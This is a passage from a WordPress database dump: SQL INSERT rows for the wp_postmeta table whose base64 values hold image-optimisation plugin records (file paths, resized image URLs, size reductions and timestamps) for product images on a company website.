5vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxNDc1LCJ0aW1lIjoxNDgzNTczODM0LCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTExNHgxMzAuanBnIiwid2lkdGgiOiIxMTQiLCJoZWlnaHQiOiIxMzAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0xMTR4MTMwLmpwZyIsInJlZHVjdGlvbiI6NDkwLCJ0aW1lIjoxNDgzNTczODM3LCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTE2MHgxNjAuanBnIiwid2lkdGgiOiIxNjAiLCJoZWlnaHQiOiIxNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0xNjB4MTYwLmpwZyIsInJlZHVjdGlvbiI6NTI2LCJ0aW1lIjoxNDgzNTczODQxLCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6NjE2LCJ0aW1lIjoxNDgzNTczODQ0LCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6ODI3LCJ0aW1lIjoxNDgzNTczODQ4LCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6OTExLCJ0aW1lIjoxNDgzNTczODUxLCJpZCI6MTI3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0zLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMy00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6MTE5NywidGltZSI6MTQ4MzU3Mzg1NSwiaWQiOjEyNzV9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29635, 1273, 'wpfc_optimisation_reduction', '20695'); 
INSERT INTO `wp_postmeta` VALUES (29636, 1273, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTIuanBnIiwid2lkdGgiOjUwMjQsImhlaWdodCI6Mzc0NCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU3Mzg2MCwiaWQiOiIxMjczIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk5MSwidGltZSI6MTQ4MzU3Mzg2NCwiaWQiOjEyNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi04MDB4NTk2LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTk2LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItODAweDU5Ni5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTgwMHg1OTYuanBnIiwicmVkdWN0aW9uIjoxOTIwLCJ0aW1lIjoxNDgzNTczODY4LCJpZCI6MTI3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTc2OHg1NzIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1NzIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi03Njh4NTcyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItNzY4eDU3Mi5qcGciLCJyZWR1Y3Rpb24iOjE5MDQsInRpbWUiOjE0ODM1NzM4NzEsImlkIjoxMjczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMTYwMHgxMTkyLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjExOTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0xNjAweDExOTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0xNjAweDExOTIuanBnIiwicmVkdWN0aW9uIjo1NjY4LCJ0aW1lIjoxNDgzNTczODc2LCJpZCI6MTI3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjc0MCwidGltZSI6MTQ4MzU3Mzg4MCwiaWQiOjEyNzN9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NjYsInRpbWUiOjE0ODM1NzM4ODMsImlkIjoxMjczfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjM5LCJ0aW1lIjoxNDgzNTczODg2LCJpZCI6MTI3M30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE2MDMsInRpbWUiOjE0ODM1NzM4OTAsImlkIjoxMjczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0ODYsInRpbWUiOjE0ODM1NzM4OTQsImlkIjoxMjczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0xNjB4MTYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMTYweDE2MC5qcGciLCJ3aWR0aCI6IjE2MCIsImhlaWdodCI6IjE2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo2NzAsInRpbWUiOjE0ODM1NzM4OTcsImlkIjoxMjczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMTgweDE4MC5qcGciLCJ3aWR0aCI6IjE4MCIsImhlaWdodCI6IjE4MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTE4MHgxODAuanBnIiwicmVkdWN0aW9uIjo3MzQsInRpbWUiOjE0ODM1NzM5MDAsImlkIjoxMjczfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjoxMjYxLCJ0aW1lIjoxNDgzNTczOTA0LCJpZCI6MTI3M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTMwMHgzMDAuanBnIiwid2lkdGgiOiIzMDAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi0zMDB4MzAwLmpwZyIsInJlZHVjdGlvbiI6MTQ1MywidGltZSI6MTQ4MzU3MzkwNywiaWQiOjEyNzN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy0yLTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctMi00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLTItNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjIwNjAsInRpbWUiOjE0ODM1NzM5MTIsImlkIjoxMjczfV0='); 
INSERT INTO `wp_postmeta` VALUES (29637, 1271, 'wpfc_optimisation_reduction', '37839'); 
INSERT INTO `wp_postmeta` VALUES (29638, 1271, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My5qcGciLCJ3aWR0aCI6MzA1OSwiaGVpZ2h0IjoyNTI4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMuanBnIiwicmVkdWN0aW9uIjozNzgyNSwidGltZSI6MTQ4MzU3MzkyMywiaWQiOiIxMjcxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NzM5MjUsImlkIjoxMjcxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTgwMHg2NjEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo2NjEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtODAweDY2MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My04MDB4NjYxLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzkzMCwiaWQiOjEyNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtNzY4eDYzNS5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjYzNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My03Njh4NjM1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3ZlcnRyZWwtc2RnLWUxNDczMjU3NjMyMjczLTc2OHg2MzUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTczOTM0LCJpZCI6MTI3MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0xNjAweDEzMjIuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTMyMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0xNjAweDEzMjIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMTYwMHgxMzIyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU3MzkzOCwiaWQiOjEyNzF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvdmVydHJlbC1zZGctZTE0NzMyNTc2MzIyNzMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC92ZXJ0cmVsLXNkZy1lMTQ3MzI1NzYzMjI3My0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRz